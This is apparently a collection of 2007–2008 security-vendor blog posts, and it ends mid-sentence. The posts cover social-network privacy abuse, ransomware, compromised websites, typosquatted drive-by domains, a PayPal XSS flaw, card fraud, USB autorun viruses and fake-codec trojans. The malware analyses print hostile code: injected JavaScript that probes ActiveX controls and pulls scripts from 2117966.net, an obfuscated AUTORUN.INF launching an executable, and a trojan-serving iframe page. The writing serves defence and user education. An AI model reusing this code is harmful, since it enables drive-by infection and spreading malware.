CA Security Advisor Research Blog

In a good example of how seemingly innocuous personal information can be used to cause significant harm, a British woman's pictures and information were copied from her Facebook profile and used to create a false profile on a Canadian fetish site (which itself offers social networking).

As reported by The Telegraph and This Is London, Becky Spraggs was on vacation when she received a call informing her that four of her pictures from Facebook had been mixed with explicit images of a woman who resembled her and used to create a profile on FetLife, a social networking site for the BDSM/fetish community. This profile used her real name and other information about her, but provided a false biography claiming that she was "looking to get into soft/hard porn films."  The profile suggested that anyone interested in "using and abusing" her should call a number and ask for either her or her manager Paul. 

The given phone number in fact led to her ex, Paul Farrow, who dealt with roughly 50 calls a week, including international calls for which he was being charged.  As of this writing, the profile is no longer up, and Mr. Farrow is reported to have blocked international calls, which hopefully offers him some relief.

This incident serves as a prime example of the unintended loss of privacy that often accompanies social networking.  Many users of social networks assume that only people in their immediate web of friends can see their profile, but this is rarely the case.  Of Myspace, Friendster, Orkut, and Facebook, not one site defaults to a "friends-only" privacy setting.  Orkut, Myspace, and Friendster make profiles visible to the entire userbase by default.  Facebook is somewhat more conservative, defaulting to "friends and networks" being able to view a profile.  In practice, however, this offers little privacy because Facebook networks are generally huge, often containing millions of members.  In addition, the location-based networks, such as the "London" network to which Ms. Spraggs belonged, require no verification to join, so that anyone could have become part of that network and suddenly have had full access to her profile.

Facebook does allow users to restrict access to their profiles, galleries, and other personal information.  This can be done by logging in, then following the "Privacy" link in the upper right corner, and finally selecting "Profile".  This will allow you to restrict the personal information on your profile to people of your choosing.  Be aware that Facebook treats your photo albums separately, however.  In order to restrict access to pictures in your photo galleries you must follow the "Edit Photo Albums Privacy Settings" link on the Profile Privacy page. 

Another very important principle illustrated by this story is that a significant amount of harm can be caused by someone with access to seemingly innocuous information.  With the use of just her ex's phone number, some perfectly innocent and respectable pictures of her, and the name and location information from her profile, a malicious party was able to significantly disrupt the lives of both Becky Spraggs and Paul Farrow.  Many users are improving their privacy practices with regard to information like bank accounts, social security numbers, and home addresses.  It is important to remember, however, that in the wrong hands almost any form of personal information can be used to inflict harm.

If you are reading this and are a user of social networking sites, please go check the privacy settings associated with each of your accounts.  What you find may surprise you.  In general, we propose five rules for protecting your privacy on social networking sites.   

1. Don't give out personal information that can lead to identity theft: your place of birth, date of birth, or social security number.
2. Increase your privacy settings to "friends only" for both your profile and your pictures.
3. Pictures can last a lifetime. Only put up pictures/videos that you would want your parents to see.
4. When signing up for new sites, fill out your privacy settings before you fill out your profile.
5. Friending someone is not just adding a name to your list.  It trusts them with your information, and should only be done to people you'd trust with your real life belongings.

Sticking to these rules is quick and simple, and it gives you control over who you trust with the details of your life.

The problem is not a new one; however, the research community has found a new variant of the fearful GPCODE
malware. To be precise, we call it "ransomware" (http://en.wikipedia.org/wiki/Ransomware_%28malware%29).

The new GPCODE variant uses 1024-bit encryption to lock down all data on an infected hard drive, and to date,
it is surely the worst one.

This is what I obtained when I ran the malware in my laboratory:

This popup displays a message that says your files are encrypted with a 1024 bit-key, and what I observed is
that every document file (.txt, .doc, .pdf) is encrypted as shown in the image below.  My pdf document for the
linksys AG241 router setting is not readable anymore.

The extension added to your document files is ._CRYPT.

According to the message, you need to buy a decryptor tool to decrypt all your documents, and the yahoo
email address through which you buy the tool is random so you cannot take action against the owner of the
email address.

Recommendations:

• Since CA Anti-Spyware detects the GPCODE ransomware variant (http://www.ca.com/securityadvisor/pest/pest.aspx?id=453098767), the safest approach is to keep
  your anti-spyware software up-to-date in order to block the malware from running and infecting your machine
• If you realize you have launched something similar to what has been described above, do NOT reboot
  your machine because our lab tests show that the ransomware does not affect the machine until it is rebooted
  

It seems Internet users do not have any peace anymore. We have witnessed a lot of security issues on
the Internet to date but never like  this latest period, which can be named -to my personal perspective- 
as “the age of compromised websites”.

The Anti-Malware research community is getting increasing daily reports relating to innocent websites
being compromised and “infected” by malicious scripts redirecting the victim users to malicious hosts which
serve and drop Malware.

This kind of attack is not new and we have been working to get the general idea of what they do during these
attacks but so far it has not very clear how they (hackers) operate.

We have received reports of dozens and dozens of compromised websites containing iframes (see http://en.wikipedia.org/wiki/IFrame for an explanation of iframes) redirecting users to many Chinese
malicious hosts.

What we are sure of is that malicious individuals are using automated tools to exploit the websites.
A common exploit strategy used is: 1) perform a scan using some search engines like Google, for example,
in order to find potentially vulnerable applications and then 2) exploit them. The exploit in this scenario consists of
an SQL statement that tries to inject a script tag into every HTML page on the vulnerable website.  What eventually happens is the attacker finds a weakness in the website, posts their malicious code, thus “infecting” the website.

A tool currently under analysis and recently known to be the tool responsible for many “infected” websites
comes directly from Chinese underground and it looks like this:

As shown in the screenshot above, the tool scans a bunch of websites making use of Google search engine
looking for vulnerable websites containing, in this case, the query string inurl:".asp" inurl:"a=".
The tool is configurable so every vulnerable string can be set to launch the attack.
Another interesting part of the tool is the malicious javascript code used to insert and inject the vulnerable
websites making them compromised (see below):

As shown the formset in this case is configured to inject the string:

<script src=http://www<dot>2117966<dot>net/*uckjp.js></script>

Dissecting the malicious javascript file we find further interesting information:

…
{document.write ("<iframe width=-1 height=-1 src=\"2117966net/q.htm/">hxxp://www<dot>2117966<dot>net/q.htm\"></iframe>");}
else
{document.write ("<script src=http:\/\/www.2117966.net\/Xjp.js><\/script>");}
…

The code above means that main javascript code leads other malicious sections but still in the same host
(2117966.net).

Content of q.htm:

…
document.write("<script src=http://www.2117966.net/Ajax.gif><\/script>")
document.write("<iframe width='0' height='0' src='http://www<dot>2117966<dot>netMs06014.htm'></iframe>")}
else{
try{var r;var reals=new window["ActiveXObject"]("IERPCtl.IERPCtl.1");}
catch(r){};
finally{if(r!="[object Error]"){
document.write("<script src=http://www<dot>2117966<dot>net/Real.js><\/script>")}}
try{var g;var storm=new window["ActiveXObject"]("MPS.StormPlayer");}
catch(g){};
finally{if(g!="[object Error]"){
document.write("<script src=http://www<dot>2117966<dot>net/Bfyy.gif><\/script>")}}
try{var i;var thunder=new window["ActiveXObject"]("DPClient.Vod");}
catch(i){};
finally{if(i!="[object Error]"){
document.write("<script src=http://www<dot>2117966<dot>net/Ms07004.html><\/script>")}}
try{var j;var lianzhong=new window["ActiveXObject"]("GLCHAT.GLChatCtrl.1");}
catch(j){};
finally{if(j!="[object Error]"){
document.write("<script src=http://www<dot>2117966<dot>net/ms06067.js><\/script>")}
if(r=="[object Error]"&&g=="[object Error]"&&i=="[object Error]"&&j=="[object Error]"){
document.write("<iframe width='0' height='0' src='http://www<dot>2117966<dot>net/QVod.html'></iframe>")}}
…

The various iframes shown in the code above lead to other malicious pages and malicious scripts which in turn
lead to other malicious scripts and malicious pages creating a real complex number of wrapped links  dropping
-at the end of the chain- dangerous malware on the victim machines.

What can a user do?

It is not easy to understand if a website is “infected” or not.  Many users report that they simply browsed a website
and then became “infected.”  This scenario doesn’t make you feel very well protected especially if you take care in
where you browse.  As a result of this type of attack, a website that would normally be considered innocent or
benign can stealthily become malicious.  One day the site is safe then next it is dangerous.  This is what makes
this type of attack so effective. 

From the user side, a safe approach is to keep your anti-virus and anti-spyware software up to date.  Additionally
one may consider setting Internet Explorer to prompt the user before following an iframe.  (See instructions here: http://support.microsoft.com/kb/182569/en-us)  Lastly one may consider the use of content filtering tools. 

These tools are able to block malicious javascript and alarm the user before being redirected to another website.  Remember it’s typically the website that you are redirected to that hosts the malware that is downloaded to
your computer. 

What can a website owner do?

From the website owners point of view it is recommended that they scan their webpages looking for known
vulnerabilities.  This step alone will eliminate the majority of exploit vectors.  Of course there are potentially
unknown, or “zero-day” vulnerabilities, but closing the known vulnerabilities will greatly reduce the vulnerabilities
that are most commonly exploited via automated tools.  Additionally website owners can consider the security
help-service provided search engines as described here.
Needless to say that it is strongly recommended  to keep web servers up to date to the latest released patches;
this would hugely decrease the number of vulnerabilities.

In this article I promise deception, technological trickery, impart a bit of knowledge, insight, and all through what I hope to be an interesting read for you.

I was browsing through a long list of malicious URL's and I came across an interesting URL that caught my eye, hxxp://www.yahoo550.com/...../logo.jpg?queryid=77092.  Your first question might be; What is a URL?  Well, most of you know it as another name; simply put, a text string that represents a website and its path or components.  URL stands for uniform resource locator.  Your second question might be; why did it catch my eye?  Well lets take a closer look at the anatomy of a URL.  Trust me; the really interesting parts are coming soon.

Take the website http://www.ca.com/.  The "www" represents that the website is on the World Wide Web.  This value is optional when putting it into your web browser.  The "ca" section is what is referred to as the domain name.  It often (but not always) indicates the name of something (i.e. McDonalds.com, or Microsoft.com).  It could also be something random, like 66123.net (which is actually registered).  The ".com" portion is what is called the suffix.  This usually represents the type of organization that is operating the network.  For example ".edu" is reserved for education entities, ".gov" the government sectors and ".org" for non-profit organizations.  There are many others, but I think you get the point.  Anything that trails the suffix (i.e. ".com", ".gov") is what is called the pathname or directory, and this pathname (with special characters) can lead to static documents (web pages) or dynamically available content such as user requested values passed back to and from a database.  More on that later.  For instance the URL http://www.ca.com/us/securityadvisor/ tells us that the domain belongs to CA, the "/us/" tell us that this webpage belongs those customers who chose US-English as their viewing website, and finally /securityadvisor/ is the desired landing directory that the user navigated to.  All of this makes up the full path or URL.

So what makes this URL deceptive?

Whew, now that that boring stuff is out of the way I can tell you more about the URL that I discovered.  At first glance the domain portion of the URL (yahoo550) looks very similar to the popular website and user community Yahoo!.  One might assume that this is one of Yahoo!'s thousands of webpages.  Did you know that Google owns 520 different domains?  That is right, so why wouldn't you think that Yahoo! owns yahoo550.com?  But they don't.  In fact someone by the name of Bill Adward owns it.  More on him later. 

The yahoo550.com URL seems innocuous enough; in fact it is very similar looking to Yahoo!'s Yahoo360 social networking website (similar to Facebook and MySpace).  The main difference is that when visiting the Yahoo360 site the URL actually reads http://360.yahoo.com/.  That is because the "360" portion of the URL is the hostname of the server in that domain.  Similarly if you went to http://travel.yahoo.com/, yahoo is the domain and travel is the hostname for the site that houses all the travel information for Yahoo!.  So you can see where one might think that yahoo550.com is part of the larger yahoo domain infrastructure.  But as stated, yahoo550.com is not owned and operated by Yahoo!.  This is a clear effort to deceive the public by obfuscating the URL.  Further more, when you visit the yahoo550.com website your computer is infected with malicious software. 

So why obfuscate a URL?

Internet con artists, aka Criminals will obfuscate websites or URLs to trick users into visiting their websites by making people think that they are clicking on an innocent or familiar URL; for example a link embedded in an email or webpage.  This tactic is also used in phishing.  So what is the benefit of tricking people?  The main reason is money.  There is a flourishing criminal enterprise that is running on (or underneath) the Internet.  Mostly, when unsuspecting people click on what seems like an innocent URL, their computer system could be infected with malware (malicious software).  This software could take complete control of your computer turning it into a bot or using it to display revenue generating adware.  A bot is part of an army of infected computer systems controlled by others called a botnet.  For more information on botnets you can read the following: http://community.ca.com/blogs/securityadvisor/archive/2007/11/07/web-of-deception.aspx.  The worst case scenario is when the installation software is used to steal personal information, such as credit cards or social security numbers.  I am sure you have heard about the horrors of identity theft.

There are many ways to disguise a URL.  You can do it through typo squatting, which is changing a letter or two in the domain name or just confusion through similarity.  This would be inserting an extra character like an "i", "l", or switching a "1" for a "l", "0" for "O".  Hard to tell the difference when they are all combined in a string of characters.  As promised before, I will talk more about the pathname and how in my example it was used to deceive Internet users. 

When describing the full pathname (i.e. /us/securityadvisor/ or /..../logo.jpg?queryid=77092), some characters in this portion of the URL path are special and have a different meaning than regular plain text characters.  What do I mean by that?  Well, characters such as the "&", "?" and "=" all have special meanings or functions in the URL string.  The pathname can contain a query string.  This is represented by the presence of a "?" in the URL.  What follows the "?" is interpreted by a backend program intended to handle the user request or query.  Sorry for the techno babble, but here is what I mean.  If you went to espn.com and went to their gallery of sports images you would see a URL that looks something like this: http://sports.espn.go.com/espn/apphoto/photo?photoId=1880786&sportId=90.   Lets cut down the URL to the interesting part, photo?photoId=1880786&sportId=90.  The first "photo" is an application that reads the string of text following the "?".  The "photoId=" is telling the "photo" application what file (or photo) to return to the user.  The numerical string "1880786" is the filename or value ID, and the "&sportId=90" is the identifier for pictures in the ESPN database that are hockey related.  Pictures that fall under the NFL would be "sportId=28.  These are nothing more than groupings.

Okay, so where am I going with all of this?  I will tell you.  Let's go back to our original URL: hxxp://www.yahoo550.com/..../logo.jpg?queryid=77092.  When I first came across this, I assumed that by going to this website it would show me a logo (file type .jpg) which has the filename or value 77092.  So I would imagine that if I was on a website with hundreds of thumbprint pictures or logos and I selected one that I wanted to view, the URL would transform my request into a query "?queryid=77092" and present me that logo.  Well, that is not what you get when you visit this malicious URL.  Now just imagine that you receive an email like the one below.  If the topic interested you, you might just assume that the URL in the email is going to lead you to a website that belonged to Yahoo!.   

Figure 1

Interestingly enough, no matter what number trails at the end of the query (i.e. 77092) you will get the same piece of malware.  I inserted various numbers, 4, 554, and 77458, each time I received the same malicious code.

Here is an example of a website that you would more clearly be able to identify as potentially malicious:  hxxp://216.12.204.2/..../scfl.exe.  You can tell because the file trailing the pathname is an .exe, which doesn't in and of itself mean that it is malicious, but you would want to make sure that you trust the site and the executable that you are downloading and installing before you clicked the link.  The main difference between our yahoo550.com example and this one is that with the yahoo550 site, just visiting it can infect your computer system with malware.  This is also known as a drive-by-download.

So what is behind this URL?

Here is where the interesting parts occur.  There will be differing results depending on what Internet browser is used to visit the site (for the record, I do not recommend you doing so).  If you use Firefox your browser will render a little image in the top left hand corner that when resolved just displays the website.  See figure 2 below.

Figure 2 

The above page looks innocent enough; however, if you view the source for the page, you will see that there is actually a binary executable file that is packed with UPX.  UPX is a tool used for both compression and obfuscation.  UPX is popular among malware authors.  See figure 3 below.

Figure 3

Originally when I visited the site with Microsoft Internet Explorer browser, I received a popup window informing me that the file was being downloaded to my temporary directory.  The binary was disguised as a large empty image displayed in the Windows Picture and Fax Viewer as shown below, when in fact it is actually an executable file.  See figure 4 below.

Figure 4

Now upon returning to the site, instead of the aforementioned popup, the binary code is now just spewed across the browser screen as if it were just text.

Just by visiting this website your system has now been infected with a trojan and backdoor, which seems to have some functionality issues.  This particular malware has taken on many names from the security community, such as Win32/Farfli.G, Trojan,DR.HMir.Gen2, Sus/Behav-194 and others.

So, just who is this site registered to? Who is responsible for this?  According to Whois.net, the site was registered to Bill Adward in California.  This site was registered recently in October of 2007, and only for one year.  The short term lease of the domain name can be indicative of registering it for malicious or criminal intent.  I am fairly confident that all the information supplied is false as well, and the site was probably procured with a stolen credit card from previous criminal activity.  While the registration information for the yahoo550 site is domestic to the US, a website is inserted into the web browser's favorites (6781.com) and is registered in Beijing China.  From what I was able to observe, no malware was dropped from this 6781.com site.      

The moral of this story is that you have to really be careful about clicking on URL's that are sent to you, even from those people you know, and that you do not accidentally mistype an important URL such as your bank or other financial institution's website.  There are a lot of unscrupulous people lurking on the Internet looking for victims to prey on.  People will often register websites for malicious or criminal purposes that are very similar to the popular or intended website.  While this particular piece of malware didn't really seem to cause any severe damage or impose immediate danger to the system, the fact remains that there are malware in existence that can be very dangerous and the vector used by yahoo550.com is common and should be taken seriously.

Take a close look at this image.  You can click to enlarge it.

It looks like the PayPal login page, but some things are off. For one, the title is "Login - PayPal Phishing Proof of Concept". That is because this isn't the PayPal login page at all, but a Phishing proof of concept. It was hosted on PayPal's servers and secured with PayPal's security certificates, but I had complete control over all the HTML, including where the login form sent usernames and passwords. This page would not have been caught by any of today's anti-phishing programs, because thanks to a vulnerability, PayPal itself was serving this page.

Thankfully, the people we contacted at PayPal were responsive and the vulnerability was resolved within minutes. To our knowledge, their quick action prevented any customers from coming to harm as a result of this vulnerability, and we applaud their speedy and responsible action on this issue. It serves as a reminder, however, of the importance of secure development when web sites are being brought online, and the importance of speedy reaction when vulnerabilities are discovered.

This vulnerability stemmed from an error jsp designed for server-side inclusion. When a page on paypal needed error messages to display, it could call this jsp and pass in the message it wanted via the err_message variable. The jsp would return that same message, formatted in a yellow box with an exclamation point graphic in front of it. This jsp was, however, open to the public in addition to being callable by other PayPal pages. The photograph below shows an example of a simple "Hello World" message being passed in to it:

This page was initially forwarded to me as a joke, with people exploiting it to make PayPal return humorous or insulting error messages. Some quick tests, however, indicated no checks were being performed on the input. The JSP wasn't differentiating between POST and GET variables, and did not filter the contents of this variable at all. This meant that HTML and Javascript could be passed in place of "Hello World", and they would be inserted verbatim into the returned page at a fixed location.

It may not seem like much, but this is all that someone needs in order to perform all sorts of mischief. Browser exploit code could have been posted, causing visitors to download and run malware. The real risk associated with this type vulnerability, however, is phishing. If the right code was passed in, the yellow box and error message can be hidden, and the contents of any other PayPal page could be displayed in their stead, modified in order to return login details or other personal information to a third party server. Since the page is being generated and returned by PayPal's servers, however, automated anti-phishing programs and even casual user inspection would reveal nothing wrong. In all aspects other than the URL path and aspects of the source code, the page would be indistinguishable from a legitimate login form. It would even be retuned over an https connection secured with PayPal's security certificates:

Thankfully, in PayPal's case, the malicious exploit of this vulnerability seems to have been avoided. Similar vulnerabilities almost certainly exist across the web, however, and we want to take this opportunity to urge web application developers to follow stringent security practices. Follow a least-access approach, preventing outside users from being able to request objects which are designed as server-side includes, and always perform checks on your input to remove potentially harmful HTML and Javascript.

The Human Story - Devil in the Details

Last week I went over to a friend's house.  For purposes of this writing, I will call her Daffodil.  As we sat around the kitchen table, Daffodil mentioned she found a strange charge on her Visa statement -- billed to a company she never heard of and on a day she didn't use her card.  She is diligent about looking over her statement every month, but generally operates by her "double digit rule." She explained, "If it is under 10 bucks, I don't give it a lot of focus."  A lot of people I talk to seem to operate by roughly the same rule.  Is a small charge really worth the time it takes to investigate it?  The charge was for $9.87 to PICTUREGLOBUS.com.  She filed a complaint with Visa and it is pending further investigation.  I decided to beat Visa to it and conduct my own investigation.  What I learned is that PICTUREGLOBUS.com is not a legit business at all, but the very edge of a larger criminal operation - siphoning millions from unsuspecting card holders by charging small amounts across a lot of people and laundering the funds overseas.  PICTUREGLOBUS.com is just one of many fake websites.  A few of the others include: imaglobus.com, pictureglobus.com, templateglobus.com, photomeridian.com, dpchallenge.com, gizmosforlife.com, estarlandgames.com, digismarket.com, mfbpsite.com, embintelligence.com, treedonlainsite.com, brookshire-ent.com, bestdigimart.com, and embintelligence.com

An Analysis of PICTUREGLOBUS

I started my investigation by going to PICTUREGLOBUS.com (abbreviated PG for this writing).  Even though I saw no indications of malware on PG, I recommend not going there, given my subsequent findings.  On the surface, the site generally looked legitimate and professional - purportedly selling stock photo images (see image below).

My first finding: Every link off the main page went to the same place - to a billing page asking for personal information and credit card information.  To be clear, Daffodil had never been to that site and definitely never entered her credit card information there.  My intent was only to see if the site was a legitimate business and a victim itself to another fraudster.  Obviously, I wasn't about to enter my personal credit card number or any other personal data, but still wanted to know what would happen if some unsuspecting user did.  What I did was buy a Visa Gift Card - which is anonymous and not tied to me, but lets one make purchases as if it were their own card.  I decided that I would try and purchase a weekly subscription - costing $2.99.  After entering this information and submitting payment, I was shocked to receive a confirmation email from the "PictureGlobus Support Team," reminding me of my login credentials.  I was surprised because if PG is just a front for other illegal operations, I assumed they wouldn't actually have a system in place to process purchases made on PG (the real business is illegally charging stolen credit card data).  I checked my Gift Card balance and almost immediately there was a charge for $2.99 - the cost of a weekly "subscription" (see image below).  

If this were a fake business, how could they have a legitimate merchant account with ability to authorize charges?  PG had to establish itself with a "payment gateway service" - a service that helps facilitate payment between customer and their credit card company.  In this case, I believe Authorize.net is the payment service.  If PG is based on criminal activity - illegally charging credit cards - how could they possibly pass themselves off as legitimate with Authorize.net who has an interest in minimizing fraud flowing through their systems?  Maybe my suspicion was unfounded, PG is a bona fide business after all and someone else charged Daffodil's card to gain access to PG.  Hmm, nice thought, but that possibility was quickly put to rest.  Using the login credentials I just paid for with my Gift Card, I logged into PG.  I didn't get too far.  All the links looped back to the homepage.  There was no actual content available after logging in.  PG was looking more and more like a fake. 

Finding 2: I dug through the page's source code and found the site was setup to block search engines from finding it (using the robots.txt method) - even blocking access to the homepage (see image below).

It is not unheard of for web sites to do this, but for a site that is suppose to be a business that makes its money by attracting site visitors, it is definitely suspicious PG is blocking what's essentially free advertising through search engines. 

Finding 3: Next I looked up who the site belongs to.  The current registrant is Domains By Proxy, run by the parent company GoDaddy.com.  Domains By Proxy offers private domain registration.  This type of service is used by the true registrants to conceal their identity.  Though this type of service is not illegal and often used for legitimate purposes, it can slow down efforts to discover the true source of fraud, spam and other illegal activities.  On the Domains By Proxy homepage, there are the following links: "if you are in law enforcement click here" and "for our subpoenas policies click here".  As of this writing, I have not been able to ascertain the true registrant of PG.  I am guessing they would rather I not find out.  I sent an email to Domains By Proxy just before this writing asking for contact information of the true registrant.  I am curious what reply I receive. 

Finding 4: When I first looked over the site, I was bit surprised to see a legit looking privacy policy.  From what I could tell, all the key privacy areas were addressed.  After searching the web, I found a legitimate picture site with the identical Policy.  I am guessing PG swiped the Policy verbatim.

How Did The Criminals Get Daffodils Credit Card Data?

Though any of these findings alone does not concretely conclude guilt, combined they scream fraud.  The charge to Daffodil's Visa was fraudulent - period.  Also, I still have no idea how the fraudsters got their paws on Daffodil's credit card number (and additional info requisite to process payment like home address and verification code).  On a daily basis I analyze malicious software aimed at rounding up personal data off computers and forwarding it to the attacker, so my obvious hunch was that Daffodil was infected with spyware.  Long story short, I did a full analysis of her system and found not even a trace of spyware.  Next I thought maybe she was a victim of phishing.  Phishing is a scheme where a victim is lured into filling out personal information on a website that looks totally legit, but the data is actually routed to a third party attacker.  I checked a variety of locations on her system and found no indication of phishing (a include the Temporary Internet Files and History) - though it would be impossible to make any definitive conclusion on this.  Daffodil has had the compromised credit card for over two years, so it could have been intercepted any time in between and evidence could be missing or wiped out by now.  There are too many variables here to draw any conclusion that her personal information was transmitted directly from her computer, though all indication is that it wasn't. 

A Much Larger Problem

Next, I searched the web and found a lot of other folks with nearly identical claims of being erroneously charged $9.87 by PG.  Here are a few 1, 2, 3, 4, 5, 6, 7 - and the list continues to grow.  If spyware or phishing are not the culprit, how did PG obtain such a long list of credit cards to charge?  Unfortunately, for now, any answer to this question is only speculation.  Based on a loose survey of people fraudulently charged and posting to forums, here are some characteristics:

• Users have never been to the fake website(s)
• Some users have been charged multiple times
• When victims contacted the fake websites (like PG) for a refund, PG granted it almost immediately
• Fraudsters sent preformatted responses to victims complaints
• A lot of users wrongly assumed PG (and related sites) were legit businesses, but just doing a bad thing or were victims themselves
• Charges have been made to credit cards that have never been used by the victim
• Phone numbers associated with fake sites use prerecorded messages
• No common factor links all victims (like they shopped at the same site, same card type, spyware infection, etc)
• Some of the fake websites have operated for as long as a year
• No common credit card or types were used

These characteristics propose more questions than they answer.  Who is behind all of this?  How can they continue to operate so relatively seamlessly without significant law enforcement or bank interruption?

When Daffodil called up Visa and reported the $9.87 charge as fraud, she was actually thwarting a powerful criminal organization.  In the next few days I will write a follow-up blog to paint a basic picture of how the criminal operation behind this fraud operates.  Telling Visa the charge is fraud, as opposed to disputing the charge or requesting a refund, caused a chargeback to fraudsters.  Chargebacks can cost the merchant (the fraudsters in this case) as much as $50 - that would cause them a net loss of $40.13.  If enough card holders notice the charges and initiate a chargeback, the fraudsters lose.  The power lies in the consumer's hands.  In addition, when a merchant receives a certain amount of chargebacks, flags are raised with the merchant account provider and bank - leading to a shutdown of that aspect of the operation.  Most users are good about spotting erroneous charges if they are significant, but may overlook smaller ones.  A fraudulent charge of any size is an indication you've got a real problem on yours hands and it needs to be dealt with.  This fraud scheme relies on charging small amounts across a lot of people over a relatively long period of time.  This leaves plenty of room for consumers to push back.  Your credit card number is in the hands of a serious criminal organization and you need to take action. 

If you find a fraudulent charge, here are some things you should do:

• 1) Cancel your credit card. Your card number is in the wrong hands and is likely to be used again for illegal purposes.
• 2) File a complaint with the FBI: Internet Crime Complaint Center (IC3). For any complaint launched, give as complete information as possible including the exact charge amount, company name, phone number and any other information available. The more variables you include, the greater chance investigators can find common factors across victims and nail the criminals.
• 3) Initiate a chargeback by filing a fraud claim with your credit card holder, do not dispute the charges. The distinction here is critical. A chargeback sticks the fraudster with a hefty fee and helps raise the warning flags to banks and merchant account providers.
• 4) Look back over old statements for any missed charges. In many examples, the fraudsters have made multiple charges to the same credit card.
• 5) Even though there is no indication spyware was the culprit for card loss in this case, complete a thorough scan with you anti-virus and anti-spyware products
• 6) DO NOT call the fraudsters and ask for a refund. It is counterintuitive, but in most cases they will grant you a refund immediately to keep banks and authorities out of the picture. Report it as fraud!

Daffodil admittedly got lucky when she spotted the $9.87 charge by PICTUREGLOBUS.com, but she followed up with exactly the right response.  In the future, she tells me, "I will keep a close eye on even the smallest charges for possible fraud".  And so should you!

by Rossano Ferraris

Interestingly the new year 2008 opened its doors with a surprising news in the malware field.

Hardware infected? Yes, again malware guys have showed their extraordinary fantasy to

spread panic and disasters over the computer world.

According to recent reports by SANS Internet Storm Center there is a new trend to transmit

malwares through hardware vehicles like USB ports.

As you know USB port is a very powerful channel used to transfer information-data between

our PC and an external device. Look at –for example- memory sticks, SD cards for digital

camera, GPS devices and external hard drives.

So every device plugged into your PC through a USB port is considered a hard drive,

and every device considered a hard drive by your PC can be infected by a compromising malware.

To explain better what happens from the technical point of view I would like to show you some

details regarding a sample malware I received from one of our customers who stated that his

computer machine had been compromised after plugging a USB flash card.

The malicious architecture of the malware

The malware (a virus) copies itself to every hard drive internal and external altering the AUTORUN.INF

file which (in this incident) appears so:

[AutoRun]
;liZc7kkoes7kd22k3D4Z0140fsoid2l47LiHKsLpXafw2Djr3larS5ed04sK503kUDd0Af7kDkK0FwkJ8ooJkLe1rwfrLl
open=xo8wr9.exe
;4dirwkkswijrSKkASFkKd4o2a2KJ54LAo3a5oD92Sppcd34osCwrA0dqfiJZs9L1oLaKw1D33rwLO7f4k3dsjw28offsls0ww4Ka
shell\open\Command=xo8wr9.exe
;r8k4ewsw35irr9S1iidak5oLaqw4k2D3Kf1jjdn1sUKioJlAKLioami
shell\open\Default=1
;LAKiLkkw7j2jIrSsDfFqa3ADLnq2reskSLiloawii5Kl3qaDk5w9L1m2dsklwla24edOw5rlf3w3k4fJj8i
shell\explore\Command=xo8wr9.exe
;aeDAp645K5kL71J5r7aZsc3Iksoj25ak3kaAokiw7wac2dwk1pKes5rJs2disajkLll

The malware (xo8wr9.exe) is launched every time you open your drive:

It just not only copies itself to other drives, but according to this incident-analysis I found out it

also drops other malwares into your PC starting a hidden connection with a Chinese remote malicious

server.

CA users and customers are protected from these malwares through detection by our CA anti-malware

solutions (CA Anti-Virus and CA Anti-Spyware), but as assistance in preventing future incidents

I prefer to provide you some recommendations:

• Regularly update your anti-malware solutions to the latest signature
• Possibly disable the Windows AutoPlay feature
• Start menu > Run and type “gpedit.msc”
• Select Administrative Templates > System
• On the right side pane you see an item called “Turn off Autoplay”
• Double click the item, and set the radio button to Enabled
• Change the "Turn off Autoplay on" to All Drives
• Scan your external USB device with autoplay disabled before browsing it

by Rossano Ferraris

Another interesting case I would like to bring to your attention is the effect of the so-called

“fake-codec” trojans.

Here is what I figured out after searching the phrase “daily dawn” on the Google search engine.
The screenshot reflects a blogspot webpage from the search results:

There is a video displayed on the page.
Out of curiosity, I click on the arrow-button to watch it.  After doing so, another window comes up

stating that I need to install a new version of Video ActiveX Object software for the video to play

correctly.

Then after clicking on the continue button a popup window comes up asking whether I want to save or

run an executable file.

Before going on with this analysis I would like to encourage you to sharpen your observation skills.

Take a look at the address bar of the first window which came up asking to install a new version of

ActiveX to download, shown again below.

The web site hxxp:// siski<DOT>cn is a very interesting link which is still active and whose IP address

changes day by day.
The content of this weblink is very small:

<html>

<head>

<title>play video</title>

<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">

</head>

<body> <div align="center">

<iframe src="hxxp://mymetavids<DOT>com/l/error/id/3913230/" height="400" width="502" marginwidth="0"

marginheight="0" scrolling="no" frameborder="0"></iframe>

</div>

</body>

</html>

This site contains an iframe (see http://en.wikipedia.org/wiki/IFrame for an explanation of iframes)

which redirects the active browser to another website allegedly containing the Video ActiveX Object

software. In actuality, the iframe redirects to a trojan file.

Let’s see what happens when the video-codec trojan executes.

The installation starts with a EULA presentation which appears to the user to be  something serious and legitimate:

Once installed the end-user is requested to restart the browser:

When I restart the browser my network sniffing tool begins to track a lot of traffic being transmitted

between my local machine and the domain creatonproject.com:

oggview32.dll is an interesting malicious file installed in my C:\Windows folder and operating as

a Browser Helper Object. The file is caught during the transmission process as showed in the screenshot:

The funny thing about this malicious dll is that it pretends to be a file belonging to Kodak, getting the user to maintain it on the system. In truth the description of the file reveals it belongs to a certain inexistent Kodack company and not the well known Kodak!!

The bottom of the story is that the fake codec file we have installed is definitely malicious, dropping  a BHO

(Brower Helper Object) which in turn communicates with a third-party server without our permission

and alters the settings of the browser.

CA AntiVrus and CA Anti-Spyware products detect and remove the pests we have discussed above as

Burgspill trojans.
The sad situation is that cybercriminals do not know any limits for their malicious actions. 

For example, they exploited the tragic news of the assassination of Benazir Bhutto to inject

malicious